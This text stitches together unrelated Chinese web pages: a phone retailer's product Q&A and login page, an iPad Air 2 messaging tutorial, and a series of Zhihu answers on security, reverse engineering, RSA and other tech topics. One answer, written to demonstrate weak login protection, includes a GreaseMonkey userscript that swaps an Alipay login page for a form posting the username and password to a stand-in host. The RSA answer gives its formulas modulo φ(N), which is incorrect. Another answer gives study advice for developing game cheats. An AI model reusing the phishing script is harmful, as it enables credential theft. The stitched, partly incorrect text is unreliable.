手机可以用台式电脑的键盘来itouch可以发短信吗吗?要是可以,那itouch可以发短信吗的速度一定...

扫描二维码下载
请选择离您最近的收货城市/最近门店:
热门城市:
正在加载...
免费服务热线:
点我免费通话哦!
价格:<strong class="nowPrice" ppid="2.00
广东省广州市(移动手机卡上网全省共用出口)&&& 12:25:07<b style="color: #6****875 发布咨询: 你们3月1日发短信告诉我N1可以正常到货了,怎么现在又说没货!!!!!!
回复:亲,非常抱歉,N1目前市场货源非常紧张,到货时间不定。 感谢您的关注,祝您生活愉快!
更多咨询:
街角的が那对狗男女..:
回复:亲,非常抱歉, N1目前市场供货非常紧张,到货时间不定,您可以预定或选购其他机型。 感谢您的关注,祝您生活愉快!
JLPKASOM:
回复:亲, N1不支持无线网卡的,您可以通过wifi连接上网。 感谢您的关注,祝您生活愉快!
136****875:
回复:亲,非常抱歉,N1目前市场货源非常紧张,到货时间不定。 感谢您的关注,祝您生活愉快!
138****700:
回复:亲, N1 搭载系统,可以玩天龙八部3D的,您可以放心购买使用。 感谢您的关注,祝您生活愉快!
回复:亲, N1我网已经缺货了,不可以购买,您可以购买2,查询点击。 感谢您的关注,祝您生活愉快!(^_^)
手机用户:
回复:亲,目前 N1货源紧缺,到货时间不确定,建议您进行预约,我网到货后会第一时间通知到您,感谢您的关注!
186****350:
回复:亲,非常抱歉, N1目前没货,目前市场供货非常紧张,预计春节后才可到货。 感谢您的关注,祝您生活愉快!
回复:亲, N1目前没货,到货时间不定,价格以到货价为准,您可以预约购买或选购其他机型。 感谢您的关注,祝您生活愉快!
手机用户好用吗?容..:
回复:亲, N1用起来还不错哦,该机为32G版,实际可用空间约为27G,一般使用容量倒是够了,目前有少量现货,您可致电400-008-3939或在线咨询 QQ:进行购买。 感谢您的关注,祝您生活愉快!
回复:亲,非常抱歉, N1目前没货,目前市场供货非常紧张,预计春节后才可到货。 感谢您的关注,预祝您春节愉快!
手机动态密码登录
手机号码:
动态密码:
下次自动登陆
使用合作网站账号登录:
还没有账号?
-登录失败,请刷新二维码后重试!
使用三九APP&&扫码安全登录
刷新二维码
微信扫一扫二维码登录
各门店营业时间:周一至周日 09:00-21:30 &&&& 全国服务热线:400-008-3939 &&&& 工作时间:周一至周日 09:00-21:30
网站ICP备案号: &&&& 电信业务经营许可证:滇B2-号 &&&& 云南网警ICP备案 52 &&&&
Copyright (C) 2006 - 2016 云南叁玖网络科技有限公司(九机网),All Rights Reserved
还没有登录,登录后商品将被保存
共计:¥ 0ipad air2怎么发短信?ipad air2可以发短信吗?-平板电脑-手机开发-壹聚教程网ipad air2怎么发短信?ipad air2可以发短信吗?ipad air2是一个平板电脑了,但这个ipad air2是不能像iphone手机一样可以发短信了,那么我们如果一定要使用ipad air2发短信可以使用ios的imessage来实现发短信了,具体如下。
1、在ipad air2界面我们点击 信息 如下图所示。
2、因为不是手机所以不能直接发短信了,我们会弹出一个要我们填写Apple ID帐号。
3、选择下一步。
4、接着我们再填写要接受信息的收信联系人,输入内容,点击 发送 如下图所示。
5、发送过去了。就可以与ios设备之间进行免费短信哦(注意:是ios设置因为imessage只有ios设备才有)。
6、发送成功。
如果你希望与其它的设备如android系统手机进行发信息在ipad中只能通过微信之类的工具了,而不能使用真正的短信功能了,因为android系统不支持imessage哦。
上一页: &&&&&下一页:相关内容
Go天气森林工坊编辑推荐
电脑壁纸相关专题来自子话题:
首先蓝光光盘生产线的管理比较严格,没有像当年CD DVD那种私人生产线一大堆,更没有正经厂家偷着做盗版的情况,所以目前蓝光的盗版盘全都是刻录盘。&br&&br&其次游戏碟的防盗版机制与影碟和数据碟不同。&br&实际上是可以复制游戏机光盘上的数据的,完整复制,人家并不阻止,但是你复制出来的盘拿到游戏机上读,是不认的。&br&游戏机判断一张光盘是否为正版盘,不是看数据,而是非数据区的一串代码,代码的位置有可能在内圈(PS2的光盘),也可能在外圈(SS的光盘),光头会按照BIOS指令移动到正常光驱无法读取的位置专门读取这些数据。&br&很显然,刻录机是不可能刻录这些位置的。光盘生产线上生产的压制盘也不行,具体原理我不清楚,可能是因为盗版商只能读取正规数据,无法复制这些代码。&br&但市面上也出现过完美版的PS2盗版盘,这些盘本身与正版盘完全一样,据说是盗版商拿到了一部分子盘,或者是即将报废的母盘。&br&&br&游戏机还有一个麻烦的地方,就是它并没有操作系统,只有固化在各组件芯片中的BIOS,因此你要想让它运行盗版,必须直接更改硬件,PS2时代是直接在光驱的控制器上焊接一个芯片,跳过这个识别过程,这样就默认所有盘都是正版盘了。PS3时代由于有了OS的概念,所以重点就集中在攻破主板自检,刷OS了。&br&&br&盗版商无法复制识别码的原理我还不清楚,求教。
首先蓝光光盘生产线的管理比较严格,没有像当年CD DVD那种私人生产线一大堆,更没有正经厂家偷着做盗版的情况,所以目前蓝光的盗版盘全都是刻录盘。其次游戏碟的防盗版机制与影碟和数据碟不同。实际上是可以复制游戏机光盘上的数据的,完整复制,人家并不阻…
来自子话题:
我来个简单粗暴文不对题的:&br&&ul&&li&连MAC都不知道的算第1层,例如已经死绝了的hub&/li&&li&只知道MAC不知道IP的算第2层,例如普通交换机&/li&&li&只知道IP不知道port(也就不管TCP还是UDP)的算第3层,例如普通路由器&/li&&li&知道IP还知道port的算第4层,例如 NAT&/li&&li&关心payload的算第7层,例如 http proxy&/li&&/ul&
我来个简单粗暴文不对题的:连MAC都不知道的算第1层,例如已经死绝了的hub只知道MAC不知道IP的算第2层,例如普通交换机只知道IP不知道port(也就不管TCP还是UDP)的算第3层,例如普通路由器知道IP还知道port的算第4层,例如 NAT关心payload的算第7层,例如 …
来自子话题:
我是做移动安全方向的,这块现在大概分成四个大方向:&br&1)移动APP漏洞审计挖掘&br&2)移动应用逆向、加固、破解&br&3)平台攻防、平台漏洞挖掘、平台加固方案(例如ARM TrustZone)&br&4)反病毒木马(检测以及杀毒)&br&&br&其中1中一部分包括上面的回答提到的移动APP后端接口的安全问题,但是除此之外移动APP有它自己的特点,自然会引入一些独特的问题,例如安卓里的组件漏洞、敏感信息泄露这些,这些似乎关注的人还不是很多。&br&2有一大部分是PC平台上的延续,做的人也很多,加固方面就比如有邦邦加固、爱加密、Nega、ApkProtect等,不过加密水平参差不齐,有些还是很好破解的。这块也是黑产聚集地,例如重打包、破解的利益链条。&br&3中的漏洞挖掘包括Android、iOS系统和芯片、设备及驱动本身的各种漏洞挖掘,例如权限提升漏洞等,KeenTeam就做的这块。有些时候系统本身漏洞不好挖,就挖各种设备驱动的漏洞,柿子捡软的捏。&br&4和PC上也有一定的相似度,但移动平台、系统自身的特点更多。&br&&br&总之移动安全的范围其实并不局限于APP接口安全这么个狭窄的范围,那些也只是web的延续,只不过表现形式不一样罢了。移动安全是一个新的领域,虽然说太阳下无新鲜事,她有一些其他领域延伸的影子,但所有安全问题其实本质不都一样么:)移动安全还没到爆发点,大家也基本上是埋头只做不说,包括黑产(笑),有点觉得像web安全这些很成熟的领域早些年的时候,不过学术界倒是很热闹,移动安全的paper非常多。
我是做移动安全方向的,这块现在大概分成四个大方向:1)移动APP漏洞审计挖掘2)移动应用逆向、加固、破解3)平台攻防、平台漏洞挖掘、平台加固方案(例如ARM TrustZone)4)反病毒木马(检测以及杀毒)其中1中一部分包括上面的回答提到的移动APP后端接口的…
来自子话题:
纸条上是魔方公式 拼出来是I ? U 。本汪试了一下。&br&先拼好一个魔方,&br&&img data-rawwidth=&2448& data-rawheight=&3264& src=&/446b329bd2a38f0c90bec3b114b0cb16_b.jpeg& class=&origin_image zh-lightbox-thumb& width=&2448& data-original=&/446b329bd2a38f0c90bec3b114b0cb16_r.jpeg&&&br&&br&然后按照纸条上的公式拼,U是上面,L是左面,R是右边,F是前面,F是顺时针90度,F’是逆时针90度,F2是180度。&img data-rawwidth=&2448& data-rawheight=&3264& src=&/e6cfeedb772857fbb53375_b.jpeg& class=&origin_image zh-lightbox-thumb& width=&2448& data-original=&/e6cfeedb772857fbb53375_r.jpeg&&完成,左边面是 I ,上面是 ? ,右边那面是 Y 。(为啥不是U)
纸条上是魔方公式 拼出来是I ? U 。本汪试了一下。先拼好一个魔方,然后按照纸条上的公式拼,U是上面,L是左面,R是右边,F是前面,F是顺时针90度,F’是逆时针90度,F2是180度。完成,左边面是 I ,上面是 ? ,右边那面是 Y 。(为啥不是U)
来自子话题:
完全没这个必要,既然你的同事喜欢一直按下一步,那么只要更改软件默认安装路径就行了:&br&&br&1.打开注册表&br&&br&&p&2.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion &/p&&br&&br&3.在注册表ProgramFilesDir右击:C:\Program Files 处修改路径为其他盘,比如D:\Program Files&br&&br&这样就可以了
完全没这个必要,既然你的同事喜欢一直按下一步,那么只要更改软件默认安装路径就行了:1.打开注册表2.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion 3.在注册表ProgramFilesDir右击:C:\Program Files 处修改路径为其他盘,比如D:\Progra…
一般用户哪里懂得微软的情怀~&br&&br&&img src=&/42e21a993dd3ba4d4c4d00f415f96d2d_b.jpg& data-rawwidth=&700& data-rawheight=&560& class=&origin_image zh-lightbox-thumb& width=&700& data-original=&/42e21a993dd3ba4d4c4d00f415f96d2d_r.jpg&&&br&Windows桌面叫做Active Desktop活动桌面,存在于Windows 95到Windows XP,上面是可以放置很多日历啊代办事项啊还有网页等东东,最小化后也不会消失,始终呆在桌面上。刷新的作用就是刷新这些活动桌面的组件。&br&&br&如果手头有Windows XP,可以试着桌面右键-&属性-&桌面-&自定义桌面-&Web,然后把&a href=&& class=&internal&&&span class=&invisible&&http://www.&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&/a&添加进去试试~
一般用户哪里懂得微软的情怀~Windows桌面叫做Active Desktop活动桌面,存在于Windows 95到Windows XP,上面是可以放置很多日历啊代办事项啊还有网页等东东,最小化后也不会消失,始终呆在桌面上。刷新的作用就是刷新这些活动桌面的组件。如果手头有Windows…
来自子话题:
作为一个长期从事逆向,在各大CTF赛事砍下过许多奇怪的高分逆向题目,同时目睹身边0ops几大逆向机以及蓝莲花两大逆向机在各类逆向上砍瓜切菜的科研喵,表示以我所见所闻,所有人肉逆向机的特点,都是扎实到不能再扎实的四大基本功(操作系统,编译原理,程序设计语言和计算机体系结构),有了内功加持,看一切汇编代码,脑中自会有高抽象的模型浮现(而这正是大部分非科班出身逆向分析人员最薄弱的一环),这是胜过一切反编译器的智慧的体现。实际上,我所见的逆向机们从未说专门靠学什么特别的“逆向材料”得以突飞猛进,以我自己的经验,多年的逆向分析可能只会让你在两方面有所加强,一是使用工具的熟练,二是猜出某些特定的程序风格。但是回到最开始的问题,要想学习Linux逆向其实是个伪命题,扎扎实实把你要逆向的领域的开发知识弄得滚瓜烂熟,自然就水到渠成了
作为一个长期从事逆向,在各大CTF赛事砍下过许多奇怪的高分逆向题目,同时目睹身边0ops几大逆向机以及蓝莲花两大逆向机在各类逆向上砍瓜切菜的科研喵,表示以我所见所闻,所有人肉逆向机的特点,都是扎实到不能再扎实的四大基本功(操作系统,编译原理,程…
来自子话题:
刚好今天跟 融360 &b&前&/b&技术人员聊天,聊到这个(嗯嗯,拉他注册知乎账号啦~~很赞啦啦啦~~)。&br&他说很多人抄袭 融360 最多抄袭一个UI,背后逻辑抄不到。&br&一般是不懂互联网,界面难看,更多的是不懂金融,没办法理解背后逻辑。&br&最初以为他夸张,回来特意用融360 和X网站,填同样信息,果然是融360更好。&br&&br&1)融360 UE 更好&br&点击点击点击,不用太思考。下拉选框也比较少。其他网站表格还有输入填写。&br&不想被某网站掐死,不截图对比了。只要开始选择马上能感觉出区别。&br&&br&2)大部分文字都是口语,普通人能看懂。&br&某些网站文字非常术语,要思考含义后才能填。&br&即使贷款,大部分都是普通人,并不特别了解金融词汇,不会误解的口语,更能得到准确信息。&br&&br&3)融360有交互设计。&br&&b&据说这是他们最厉害的地方&/b&,但他们很小气,死也不讲背后逻辑。&br&讲故事的人,讲到这里也死都不讲了。商业秘密嘛,嗯嗯,能理解。&br&其他网站填写薪水,薪水是打卡入账还是现金,是否有房车等等。填写填写,点击提交等待被联络。&br&你不知道信息是否真实,也不能判断那一家银行最适合这个状况。&br&而融360,你每一个选项,每一次点击,会变更后面的选项和提问。&br&比如你曾经写薪水2000,然后又改成5000,最后写4000,这预示作弊嫌疑,他们会给信贷员提示和提示薪水(哇!这个他不说,我真的想不到!)。&br&比如写薪水2w,根本不会再提问妻子收入范围。而月薪2k,可能会提问家庭收入。&br&另外就是一直点击填写,下面会自动有搜索推荐,筛选出符合你条件的公司。&br&如果选择公司A不合适,比如因为缺乏公积金,下面还有公司B,让你再次选择。&br&点击点击再点击,无意中,薪水,工作时间,房,车,信用卡等等信息,全部填写完毕了。&br&你根本没感觉到融360在要任何信息,整个过程非常自然。人在自然状态下,最容易给出真实信息。&br&融360最后推荐的几家公司,跟目前条件非常接近。这样双方都会满意。成交率高。&br&用低薪、无交金、无房、无车填写数据,推荐公司会从花旗银行一直变变变,最后变成p2p平台,这个也比较符合实际模型。&br&&br&4)这个数据库很难复制。&br&我当时不以为然说,其实很简单啊。从薪水2K到2W我全部填写一次,你所有互动条件我都知道了。&br&好像还会考虑车、信用卡、房子,包括你填写时候是否犹豫修改数据。一个小变动会影响后面很多不同条件。&br&这是融360最初用&b&大量用户真实数据做出的模型&/b&,即使同样是月薪5K,往下填写触发条件都不一样。&br&这样才是融360给银行带来高质量用户的最核心竞争力。&br&&br&融360 比我想的更有深度,&b&互联网&/b&金融。&br&&br&补充团队资料,来自官网:&a href=&///?target=http%3A///about& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&融360公司介绍&i class=&icon-external&&&/i&&/a&&br&&blockquote&融360团队全部由资深的互联网和金融人士组成,创始人团队均拥有十余年行业经验。团队来自美国运通、百度、PayPal、宁波银行、阿里巴巴、第一资本银行等国内外知名互联网和金融服务大公司。&br&&/blockquote&&br&看到评论了~~~ 欢迎讲各种信息啊喂~~~吐槽吧吐槽吧~~ 不是广告~~&br&不过欢迎融360、中信集团、平安银行、江苏银行、南方航空等等没事给我支付宝打钱~~ &br&欢迎所有有支付宝账号的用户们,没事给我打钱~~ Y^o^Y &br&融360 好几个成员注册了知乎账号,也许他们会忍无可忍跳出来讲一线信息(补充:真的回复左夫同学了,嗯,见最下面问答)~~&br&最下方&a class=&member_mention& data-editable=&true& data-title=&@左夫& data-hash=&4ceb21c24bbd748ab42b& href=&///people/4ceb21c24bbd748ab42b& data-tip=&p$b$4ceb21c24bbd748ab42b&&@左夫&/a& 同学评论说,融360信息比银行滞后半个月嗯嗯~~ 有同感的同学咩?&br&我没用过。前面交互设计,智能推荐那个,网络试用能对比感觉出区别,而贷款信息是否滞后,需要最近贷款过的孩子才能正确评论。
刚好今天跟 融360 前技术人员聊天,聊到这个(嗯嗯,拉他注册知乎账号啦~~很赞啦啦啦~~)。他说很多人抄袭 融360 最多抄袭一个UI,背后逻辑抄不到。一般是不懂互联网,界面难看,更多的是不懂金融,没办法理解背后逻辑。最初以为他夸张,回来特意用融360 和…
来自子话题:
稍微纠正一下其它答案中的问题。&br&&br&js加密(比如腾讯)没什么安全性可言,攻击者只要把你访问的页面整个替换掉就可以了。共用路由器的话,用ARP病毒应该很容易做到。&br&&br&按照类似的逻辑,只要在登录的时候用户看不到地址是https,任何“其它方法”都不安全。就不必讨论js或者类似方案了。&br&&br&就算是用插件登录,在很多时候,攻击者也可以修改页面,让输入框根本不使用这个插件。所以除非插件另外有验证页面内容的功能,还是不能不使用https。而且就算使用https,对于本地的病毒之类的问题,有些插件也不能阻止攻击者绕过这个插件。&br&&br&比如以下GreaseMonkey脚本在Linux,Firefox中验证成功,Windows和其它浏览器就不逐个尝试了(如果Windows不行的话,还有一种合理的解释是Linux版仅仅用于避免Windows用户访问“更不安全”的页面)。以下脚本仅仅用于验证概念。真正用于攻击的话,首先要把页面做得和支付宝官方页面比较像,还要能自动给Firefox安装脚本,最好还能避免用户发觉,让用户以为登录不上去是因为网络错误或密码错误。&br&&br&// ==UserScript==&br&// @name
alipay hacker test&br&// @namespace
afdsjalfwhahefhwadskla&br&// @include
htt&b&ps://ww&/b&w.alip&b&ay.c&/b&om/&br&// @version
1&br&// @grant
none&br&// ==/UserScript==&br&document.body.innerHTML='&form action=“ht&b&tps://w&/b&ww.exam&b&ple.c&/b&om& method=&get&&&input name=&username&&&input type=&password& name=&password&&&input type=&submit&&&/form&'&br&&br&所以说,插件在很多时候也都是自欺欺人。可能阻止了一部分流行的病毒的行为,但是有针对性的攻击是否也能阻止,难说。只考虑网络安全的话用https即可,不需要另外的插件。&br&&br&更进一步地说,考虑病毒的影响的话,某些直接使用自己的客户端的验证方式也无法保证安全。比如某个病毒作者自己做一个登陆框,替换掉QQ.exe,QQ自身没有任何防范方法。只是用户很快就会发现问题而已,因为登录不上去。对QQ可能影响不大,但是想象一下要是有银行用类似的方法,病毒可以在攻击者得到密码之后,立即破坏系统文件,切断用户的网络,可以稍微用蓝屏之类的方式掩饰一下,避免用户很快直接联系银行,然后攻击者立即将用户的存款转出。只是病毒的体积可能有些大,看现在的网速可能也不是很大的问题。&br&&br&网速比较快的话,USB Key也可以做个程序远程与硬件交互,攻击者那边再装个虚拟的硬件驱动,实在不行就用虚拟机。有些设备可能解决了这些问题,毕竟网络不太可能完全没有延迟,而且带宽有限。有些设备可能没有,或者目的仅仅是避免依赖于密码。&br&&br&但是比如说,使用手机短信验证,而且保证手机不中毒,或者比如说使用带有屏幕的USB Key,那么应该是安全的。不过个人认为受盗号影响不大的普通网站没必要在用户自己中毒造成的问题上下太多功夫。这是用户自己和杀毒软件的责任。&br&&br&另外关于明文存储密码,有些人有概念错误(以下专业的人可以不必看)。明文存储密码不是要避免有人用用户的密码去登录其它网站,而是在网站自身的数据库泄露之后,避免有人直接用泄露的密码直接登录自己的网站。“从技术上保证一个网站的密码不能用于登录另一个网站”,不应该是网站的责任,而是浏览器应该做的事,虽然现在没有哪个浏览器做了这件事。&br&&br&服务器的数据库的所谓密码加密,其实是不可逆的hash,hash之后直接与数据库比较。但是js加密(或者https加密)要是用同样的方法的话,攻击者得到加密之后的内容,就可以跳过js加密的步骤,用加密后的内容直接通过验证。所以任何客户端的加密方法,都应该保证一个加密后的数据不能重复使用两次。使用的算法一般应该是可逆的,也有一些其它方案,比如两次操作顺序可交换的不可逆算法。&br&&br&所以以上就有三种不同意义的加密:1.用户在不同网站上使用不同的密码;2.传输过程中的加密;3.网站自身数据库的加密。如果要达到目的,任何两个都不能共用同一加密过程。&br&&br&第一条比起在浏览器上实现这个功能,现在似乎有个另外的趋势是用一个账号登录多种服务。实际上有一些安全隐患,因为某些不重要的小网站可以用QQ、微博账号登录,某些购物网站一样也可以用QQ、微博账号登录。这样在某些明知不安全的环境,可能比如一些网吧,注重安全而又想登录小网站的人就会比较困扰。&br&&br&&b&补充:&/b&本答案的主要目的是&b&“稍微纠正一下其它答案中的问题。”&/b&太长无法作为评论,而且很多答案的问题相似,所以作为一个答案发出来,仅此而已。所以以上各段大体上说的也不是同一件事,也不都与题主的问题有关。如果对某一部分本来就没有疑问,也没有看到别人与此矛盾的说法,可以自行忽略。&br&&br&关于病毒的部分,我没有打算特别去说病毒的问题,也不认为一般网站应该考虑病毒的问题。只是因为看到有其他回答把插件和https相比较。我是说很多浏览器插件并不能完全代替https的作用,所以两者很难直接比较。就算用js+插件的方式,如果不实现完全类似于https的功能的话,也很难达到https那样的安全性。&br&&br&&b&简单地说:&br&1.arp攻击可以篡改数据;&br&2.篡改程序的形式的中间人攻击基本无技术含量;&br&3.只要地址栏不写https,或者用户不明确知道地址栏应该是https,就有篡改程序的机会;&br&4.大部分插件并不能代替https,即使用了插件也同样需要https,除非这个插件也具备某些人所认为的https的全部“缺点”;&br&5.要达到服务器不保存明文密码所要实现的目的,一般服务端需要把传输的数据还原成明文,前后两个步骤互相独立,不能混同,也存在其它方法,但是客户端的操作也不是简单的hash,即使是不能防止篡改数据的js加密,也应该确实是加密,而不是只有hash;&br&6.是否明文传输密码(题主的问题)、是否明文保存密码、是否能防止一个网站密码泄露影响其它网站,是三件不同的事,不建议混合起来讨论,就像我这样;否则可能导致很多误会,就像我这样。&/b&
稍微纠正一下其它答案中的问题。js加密(比如腾讯)没什么安全性可言,攻击者只要把你访问的页面整个替换掉就可以了。共用路由器的话,用ARP病毒应该很容易做到。按照类似的逻辑,只要在登录的时候用户看不到地址是https,任何“其它方法”都不安全。就不必…
来自子话题:
休息完毕,开始进入答题时间!&br&在回答之前我看了一下已经有的答案,我个人感觉不太舒服… 首先,题主既然提出了问题,我们还是应该用心来答,而不是打击题主的信心… 其次,题主有这个问题的本质原因是因为RSA体制本身的一个特点决定的。我相信题主在提问前已经进行了很多的资料搜索和查找工作,甚至有可能阅读了RSA那篇原始论文。因此,我们应该更多地考虑:&br&&ul&&li&为什么题主会提出这个问题,这个问题的本质原因来自于哪里?&/li&&li&我们如何进行详细的解答,帮助题主解决这个问题。&/li&&/ul&&p&最后,一些答案本身可能会误导大家,所以还请仔细斟酌后再进行回答。&/p&&br&&p&=================分割线=================&/p&&p&我们来回顾一下RSA的加密算法。我们从公钥加密算法和签名算法的定义出发,用比较规范的语言来描述这一算法。&/p&&p&RSA公钥加密体制包含如下3个算法:KeyGen(密钥生成算法),Encrypt(加密算法)以及Decrypt(解密算法)。&/p&&ul&&li&&img src=&///equation?tex=%28PK%2C+SK%29%5Cleftarrow+KeyGen%28%5Clambda%29& alt=&(PK, SK)\leftarrow KeyGen(\lambda)& eeimg=&1&&。密钥生成算法以安全常数&img src=&///equation?tex=%5Clambda& alt=&\lambda& eeimg=&1&&作为输入,输出一个公钥PK,和一个私钥SK。安全常数用于确定这个加密算法的安全性有多高,一般以加密算法使用的质数p的大小有关。&img src=&///equation?tex=%5Clambda& alt=&\lambda& eeimg=&1&&越大,质数p一般越大,保证体制有更高的安全性。在RSA中,密钥生成算法如下:算法首先随机产生两个不同大质数p和q,计算N=pq。随后,算法计算欧拉函数&img src=&///equation?tex=%5Cvarphi%28N%29%3D%28p-1%29%28q-1%29& alt=&\varphi(N)=(p-1)(q-1)& eeimg=&1&&。接下来,算法随机选择一个小于&img src=&///equation?tex=%5Cvarphi%28N%29& alt=&\varphi(N)& eeimg=&1&&的整数e,并计算e关于&img src=&///equation?tex=%5Cvarphi%28N%29& alt=&\varphi(N)& eeimg=&1&&的模反元素d。最后,公钥为PK=(N, e),私钥为SK=(N, d)。&/li&&li&&img src=&///equation?tex=CT+%5Cleftarrow+Encrypt%28PK%2CM%29& alt=&CT \leftarrow Encrypt(PK,M)& eeimg=&1&&。加密算法以&b&公钥PK和待加密的消息M作为输入&/b&,输出密文CT。在RSA中,加密算法如下:算法直接输出密文为&img src=&///equation?tex=CT%3DM%5Ee+%5Cmod+%5Cvarphi%28N%29& alt=&CT=M^e \mod \varphi(N)& eeimg=&1&&&br&&/li&&li&&img src=&///equation?tex=M+%5Cleftarrow+Decrypt%28SK%2CCT%29& alt=&M \leftarrow Decrypt(SK,CT)& eeimg=&1&&。解密算法以&b&私钥SK和密文CT作为输入&/b&,输出消息M。在RSA中,解密算法如下:算法直接输出明文为&img src=&///equation?tex=M%3DCT%5Ed+%5Cmod+%5Cvarphi%28N%29& alt=&M=CT^d \mod \varphi(N)& eeimg=&1&&。由于e和d在&img src=&///equation?tex=%5Cvarphi%28N%29& alt=&\varphi(N)& eeimg=&1&&下互逆,因此我们有:&img src=&///equation?tex=CT%5Ed%3DM%5E%7Bed%7D%3DM%5Cmod+%5Cvarphi%28N%29& alt=&CT^d=M^{ed}=M\mod \varphi(N)& eeimg=&1&&&/li&&/ul&&p&所以,从算法描述中我们也可以看出:&b&公钥用于对数据进行加密,私钥用于对数据进行解密&/b&。当然了,这个也可以很直观的理解:公钥就是公开的密钥,其公开了大家才能用它来加密数据。私钥是私有的密钥,谁有这个密钥才能够解密密文。否则大家都能看到私钥,就都能解密,那不就乱套了。&/p&&br&&p&=================分割线=================&/p&&p&我们再来回顾一下RSA签名体制。签名体制同样包含3个算法:KeyGen(密钥生成算法),Sign(签名算法),Verify(验证算法)。&/p&&ul&&li&&img src=&///equation?tex=%28PK%2CSK%29+%5Cleftarrow+KeyGen%28%5Clambda%29& alt=&(PK,SK) \leftarrow KeyGen(\lambda)& eeimg=&1&&。密钥生成算法同样以安全常数&img src=&///equation?tex=%5Clambda& alt=&\lambda& eeimg=&1&&作为输入,输出一个公钥PK和一个私钥SK。在RSA签名中,密钥生成算法与加密算法完全相同。&/li&&li&&img src=&///equation?tex=%5Csigma+%5Cleftarrow+Sign%28SK%2CM%29& alt=&\sigma \leftarrow Sign(SK,M)& eeimg=&1&&。签名算法&b&以私钥SK和待签名的消息M作为输入&/b&,输出签名&img src=&///equation?tex=%5Csigma& alt=&\sigma& eeimg=&1&&。在RSA签名中,签名算法直接输出签名为&img src=&///equation?tex=%5Csigma+%3D+M%5Ed+%5Cmod+%5Cvarphi%28N%29& alt=&\sigma = M^d \mod \varphi(N)& eeimg=&1&&。注意,&u&签名算法和RSA加密体制中的解密算法非常像&/u&。&/li&&li&&img src=&///equation?tex=b+%5Cleftarrow+Verify%28PK%2C%5Csigma%2CM%29& alt=&b \leftarrow Verify(PK,\sigma,M)& eeimg=&1&&。验证算法&b&以公钥PK,签名&img src=&///equation?tex=%5Csigma& alt=&\sigma& eeimg=&1&&以及消息M作为输入&/b&,输出一个比特值b。b=1意味着验证通过。b=0意味着验证不通过。在RSA签名中,验证算法首先计算&img src=&///equation?tex=M%27%3D%5Csigma%5Ee+%5Cmod+%5Cvarphi%28N%29& alt=&M'=\sigma^e \mod \varphi(N)& eeimg=&1&&,随后对比M'与M,如果相等,则输出b=1,否则输出b=0。注意:&u&验证算法和RSA加密体制中的加密算法非常像&/u&。&/li&&/ul&&p&所以,在签名算法中,&b&私钥用于对数据进行签名,公钥用于对签名进行验证&/b&。这也可以直观地进行理解:对一个文件签名,当然要用私钥,因为我们希望只有自己才能完成签字。验证过程当然希望所有人都能够执行,大家看到签名都能通过验证证明确实是我自己签的。&/p&&br&&p&=================分割线=================&/p&&p&那么,为什么题主问这么一个问题呢?我们可以看到,RSA的加密/验证,解密/签字过程太像了。同时,RSA体制本身就是对称的:如果我们反过来把e看成私钥,d看成公钥,这个体制也能很好的执行。我想正是由于这个原因,题主在学习RSA体制的时候才会出现这种混乱。那么解决方法是什么呢?建议题主可以学习一下其他的公钥加密体制以及签名体制。其他的体制是没有这种对称性质的。举例来说,公钥加密体制的话可以看一看ElGamal加密,以及更安全的Cramer-Shoup加密。签名体制的话可以进一步看看ElGamal签名,甚至是BLS签名,这些体制可能能够帮助题主更好的弄清加密和签名之间的区别和潜在的联系。&/p&&p&至于题主问的加密和签名是怎么结合的。这种体制叫做签密方案(SignCrypt),RSA中,这种签密方案看起来特别特别像,很容易引起混乱。在此我不太想详细介绍RSA中的加密与签字结合的方案。我想提醒题主的是,加密与签字结合时,两套公私钥是不同的。&/p&&br&&p&如果题主还有进一步的问题,欢迎留言。我个人是衷心希望大家都了解一点密码学的知识,以便了解庞大的计算机网络系统到底是如何保护数据安全性的。希望我的回答能对题主有所帮助。&/p&&br&&p&以上&/p&
休息完毕,开始进入答题时间!在回答之前我看了一下已经有的答案,我个人感觉不太舒服… 首先,题主既然提出了问题,我们还是应该用心来答,而不是打击题主的信心… 其次,题主有这个问题的本质原因是因为RSA体制本身的一个特点决定的。我相信题主在提问前…
来自子话题:
看题主的描述应该是想学外挂开发方面的吧,那我姑且把范围划到Windows下X86/X64的逆向与分析,提供一个入门学习的个人不完全的小意见: &br&&br&1.学习C/C++语言与Windows下的32/64位汇编语言,大致学习掌握计算机组成,熟悉语言的各方面实现细节。了解程序特别是底层的运作机制,因为在实战中你将面对的是文档几乎为0的底层汇编代码,了解它们是如何工作很重要。而且还有一点现在几乎所有的游戏底层都是用C++编写的。
&br&&br&2.光有语言的基础还要懂如何运用到实战中去,这里推荐一本书:REVERSING:逆向工程揭密。一开始可能面对一个大型的项目可能会力不从心,比如现在不少游戏都有内核级的进程保护模块,而且代码量巨大,结构复杂。入门可以跟从书上的例子进行实践,或者在网上找些creakMe之类的先练练手。渐渐熟悉之后再找一些大型的程序逐渐深入。&br&&br&3.学会使用工具很重要,在逆向中广泛使用的工具如静态反汇编IDA pro和动态调试器OllyDbg还有内核调试winDbg等等,要熟悉它们的使用方式,要懂得调试程序,掌握一些调试技巧,这方面资料在网络和书籍上都有很多。更进一步可以尝试编写些小插件辅助自己的分析。
&br&&br&4.多关注这方面的消息,比如国内的看雪论坛就有不少这方面的高手,也常常能见到这方面的分析讨论。同时最好能够广泛涉猎,多了解相关的知识如加密解密,网络原理,内核编程,反调试和代码混淆等等的会大有裨益。另外逆向分析别人的游戏外挂有时会有惊奇发现哦,比如发现种新的绕过方式,比如挖出个后面木马什么的然后反向社工爆菊什么哈哈哈。
&br&&br&手机码字,排版格式不太好,思路也不是很清晰,以后有时间修正。
看题主的描述应该是想学外挂开发方面的吧,那我姑且把范围划到Windows下X86/X64的逆向与分析,提供一个入门学习的个人不完全的小意见: 1.学习C/C++语言与Windows下的32/64位汇编语言,大致学习掌握计算机组成,熟悉语言的各方面实现细节。了解程序特别是底…
来自子话题:
&ol&&li&入门&br&
